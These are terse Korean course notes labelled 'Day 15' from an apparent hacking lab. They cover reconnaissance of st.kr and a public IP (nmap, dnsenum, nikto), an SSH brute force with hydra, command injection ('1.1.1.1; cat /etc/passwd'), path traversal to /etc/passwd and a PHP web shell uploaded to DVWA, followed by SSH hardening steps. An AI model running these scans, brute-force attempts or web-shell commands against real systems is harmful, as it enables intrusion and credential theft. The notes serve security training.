15일차

ping st.kr
nslookup st.kr
traceroute st.kr
nmap -v -sT -O st.kr
dnsenum st.kr
nikto -host st.kr

시스템 사용자를 찾아라
kali >
ssh 125.246.95.152
ssh 루트 접속 가능여부
cat /etc/ssh/sshd_config->루트로그인 제한

hydra -L user.txt -P passwd.txt st.kr ssh

adduser word
adduser dvwa
adduser web1
adduser web2

cat /etc/passwd
1.1.1.1; cat /etc/passwd
dvwa security low로 바꾸기
?page=file1.php
?page=../../../../../../../../../../../../../../etc/passwd
파일 업로드
attack.php를 업로드한다
nano attack.php <-칼리로


/hackable/uploads/attack.php?cmd=ls
/hackable/uploads/attack.php?cmd=cat /etc/passwd

ssh 접근을 차단하라
1.열고 닫기
2.닫고 열기 > 다 닫힘
/home/dvwa/public_html/hackable
nano /etc/hosts.allow 192.168.0.123
nano /etc/hosts.deny #All : All->All : All
ssh 번호를 변경하라
nano /etc/ssh/sshd_config

cd /etc/apache2
cd sites-available
ls
nano hosting.conf